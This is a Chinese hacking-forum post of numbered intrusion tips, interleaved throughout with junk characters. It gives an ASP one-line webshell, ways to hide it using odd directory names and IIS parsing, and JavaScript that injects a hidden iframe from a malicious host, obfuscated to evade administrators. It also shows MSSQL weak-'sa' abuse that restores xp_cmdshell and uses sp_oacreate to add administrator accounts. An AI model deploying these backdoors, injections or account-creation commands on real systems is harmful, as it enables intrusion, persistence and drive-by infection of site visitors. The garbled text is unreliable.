; o8 G/ Q2 ]5 F- P- |8 ~' q
6 S/ n, h! D2 r1 N# l7 d, k+ q52、at "12:17" /interactive cmd
/ R$ r! A7 r7 X, F执行后可以用AT命令查看新加的任务. {$ z1 m4 t6 o& B% u
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
' v1 _1 v4 M8 m1 Z/ i) s8 m! b/ H3 Q/ D4 R
53、隐藏ASP后门的两种方法9 g0 H! b4 {- L0 b  k+ l# ]0 }9 j
1、建立非标准目录:mkdir images..\' E: W5 a7 D0 D4 W# p3 k
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp/ n# x- t. [7 R$ d" W
通过web访问ASP木马:http://ip/images../news.asp?action=login& \7 W5 ^; i6 m) [
如何删除非标准目录:rmdir images..\ /s9 P0 H9 P0 x6 I' L4 D
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:$ H+ `4 E2 T8 @0 L
mkdir programme.asp
+ ?  T! P- M) I3 a( n5 s6 ~( f5 O8 w新建1.txt文件内容:<!--#include file=”12.jpg”-->1 J) M4 k$ {* I: V- {7 s
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
) P) a% M. y! I7 x/ Fattrib +H +S programme.asp
2 @0 Z/ p  U2 D: H3 ^9 q$ J) r通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" U: V5 a2 D9 I5 X+ ^: u

+ w# W' ]" F( @3 J54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。9 i: U% e3 i, H! ^% W: l$ A
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。+ X9 b: K4 b; k. _; F3 k/ a

* V5 V3 O, a# n( A1 m7 G) k55、JS隐蔽挂马1 C! U5 V- m- s# J
1.
+ a& {. V( W% P9 Z* f/ j0 nvar tr4c3="<iframe src=ht";% q  A% R2 J$ [& G5 {2 |
tr4c3 = tr4c3+"tp:/";" _3 x$ p" `* G! a+ o
tr4c3 = tr4c3+"/ww";
# y( G% W! ]1 ]/ B, U4 itr4c3 = tr4c3+"w.tr4";- W- x; P" F8 r# j+ V8 }3 g
tr4c3 = tr4c3+"c3.com/inc/m";
1 z5 y5 t1 h' B( E+ atr4c3 = tr4c3+"m.htm style="display:none"></i";
5 h: ^) x5 b9 S5 Mtr4c3 =tr4c3+"frame>'";: b5 E5 z- _; R7 Y% Q# r
document.write(tr4c3);
( P: [% O* R' t  i' g# v避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
9 E& G1 J7 W1 y9 R' O+ e
! }9 L$ d+ M  g+ R2 u2.
. }- ]/ O6 m" ]# i转换进制,然后用EVAL执行。如
; j* V4 q/ Y3 S% c: |7 J- }" teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, {8 @, M$ e+ O不过这个有点显眼。9 ]- Q% D( c" ?, B
3.
3 D; k! }! \6 f7 v9 ?+ Rdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');  D; |$ ^0 N3 r# e7 A( t
最后一点,别忘了把文件的时间也修改下。! k9 C; f4 U1 q9 @2 ]( H
8 x. a/ _( \- K9 s4 G, X
56.3389终端入侵常用DOS命令
  x6 P7 B" L' s. j+ ytaskkill taskkill /PID 1248 /t
2 z5 ?6 d3 C  }+ \
  m, m# C+ Y1 A& Z0 W4 w* X$ dtasklist 查进程
- X# v0 e0 j- s" B
2 A/ y; O2 d% o9 bcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
+ f: k, J2 H4 C5 |  hiisreset /reboot
4 H& J/ I4 H4 ptsshutdn /reboot /delay:1    重起服务器
$ k7 K+ |  ]5 V# m- `$ B
- w( D: v) y1 {# Glogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 b. F- h0 l3 o2 q! }' u6 D7 a; k% a+ z
query user 查看当前终端用户在线情况4 a- D) ]# X3 G" x6 |$ T

$ g1 K* @- v9 g% e+ c0 ], q2 K' q要显示有关所有会话使用的进程的信息,请键入:query process *3 N, ^6 J( H+ X' H
5 K# t# ^8 X3 q1 h& V; {
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2, k3 o: ~" L& P. C4 y+ [

+ |( T/ C% T1 q# i4 \要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2* T; J' c( b% Q# ]
& z6 g- \% S) m' [
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" k4 r. j: i& Q3 G% D, _, v! d1 t- ^+ n0 R# ]
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
5 c* `( S. e4 l- q. {7 K. M+ ?( N, L8 E8 t6 H
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统0 w7 K/ e$ ]' ]. D9 b- L

& _/ i& f* \# e; y) v0 ?命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。6 H3 G9 t- u1 F9 ]7 M2 H( L

2 x7 T5 _; U5 n% X$ n  [1 X命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机  D; g5 |5 j3 b& I+ Q, x

& K3 j0 _* r  p+ A  ^# J4 N, j56、在地址栏或按Ctrl+O,输入:
' b( _( U8 r$ R' c1 \$ P8 M: a. Zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 u5 @! R) i2 ~- C5 {7 U

; `1 t+ z% J/ E5 m. y, d& P源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。6 I' q/ g3 p2 C
) O& \, w: d3 [: A2 ]; r1 a! s9 K
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,9 R  r, E1 W/ ]9 y6 {
用net localgroup administrators是可以看到管理组下,加了$的用户的。* {& A- r+ z# s. R
! e2 @, D0 T+ O2 j4 k  b
58、 sa弱口令相关命令
$ a9 z- r/ h- r. I' j- Q" R5 _  C+ S8 O! O3 {
一.更改sa口令方法:
! p2 K% Z3 o' S  g9 [用sql综合利用工具连接后,执行命令:
2 Y9 y1 h, S0 d; R2 l& rexec sp_password NULL,'20001001','sa'
1 |1 e) B- l4 o4 ]& K5 s(提示:慎用!): H, K* [$ I! ]% e! y0 V  f( {

. q% |& r5 s5 w) t二.简单修补sa弱口令.  `' R% i( U3 e/ z, Q% }

5 k8 C. P* Q) }7 C$ C0 K方法1:查询分离器连接后执行:
6 o& V- R+ z) E2 A& R. m1 s' l2 qif exists (select * from9 l( Z% X7 w# b- M, c& m& t5 q
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
7 L" G) P9 p7 nOBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 [1 p, d+ t  ?
" r. |! m/ H' C. E( o' k% O+ K
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
1 s1 m) Y, N1 X
6 d. [" u5 j) H( v/ J+ _GO
5 B3 \+ v% G& @. Z. P; ~! p- D/ }6 Z7 ?* C1 d1 V6 I4 e
然后按F5键命令执行完毕2 \' ?0 I$ r+ H, x; @, _7 V7 d

/ P3 d- E% S$ m: M方法2:查询分离器连接后8 x  F, W' H" K" V, t
第一步执行:use master; B5 @, M2 W7 }# L# u. s' G5 U
第二步执行:sp_dropextendedproc 'xp_cmdshell'
) q; Y- p# v& u/ Q& {. i3 t, ?然后按F5键命令执行完毕
, \- H# l( n/ Z7 X, b0 i* f; K6 e1 z1 }3 }
8 D$ ?2 T& B& V  S0 W/ v' z
三.常见情况恢复执行xp_cmdshell.  Y% p0 o6 Z$ R  s7 N$ Z/ q) ~
3 t( A6 X0 L8 F8 b. p

' I8 S4 a" K4 q1 未能找到存储过程'master..xpcmdshell'.
8 S; @% k$ {# m) R2 ~   恢复方法:查询分离器连接后,$ [2 F. ?$ \8 S, i. }  o0 o
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int9 R$ w4 N! |; \
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# j/ S" ?& d- |然后按F5键命令执行完毕
+ \3 n) l4 J% ?- X( S
6 k! m# i, X6 n2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
8 }! @7 q  t, z, P& ^3 z恢复方法:查询分离器连接后,
$ q$ f1 q' H/ f. O- Z/ b  e4 y第一步执行:sp_dropextendedproc "xp_cmdshell"  _2 \; g  h( u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'1 x5 I, V2 q8 _2 w0 T$ S% |
然后按F5键命令执行完毕
" s- L( ?3 z& K* |* l
* r4 i/ u% e8 R0 a+ L! g" v3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)' x- p7 Q7 {* b% P  Z9 Y$ Y; L* a# z
恢复方法:查询分离器连接后,1 d0 ~2 [+ G1 z, X9 d1 e3 ]& u
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'- A0 Y+ L6 J/ z+ N
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
6 m8 g6 A) |4 b! S) ^) L6 X然后按F5键命令执行完毕
8 Z6 j* j' B9 }# I' B
% Q( c3 W! @. R& t2 A. E四.终极方法.
3 i  L/ U7 ]1 V  A% c: X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:: w) I- O6 |/ U& e0 t' L1 q7 x% |
查询分离器连接后,
. c# f1 I) e, i9 q) v& u2000servser系统:0 K/ X6 Q: r7 e2 g4 [1 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
/ Z6 ?, U5 g( y7 @3 t
% k' B- n: ?4 C2 z" P) v+ ~, ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'4 M* d  Y7 ?8 c3 r! }" v
4 E+ N: ~* Q0 j- ~
xp或2003server系统:- y2 g3 v# Z! X: u, n
# n  j! x. g4 X: P. G: }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* Z; U, R, ?) i3 N  I9 K3 t2 {% W; o  i+ |( u: a2 H7 R: o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'! E) k. k. C, i) Q7 x





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2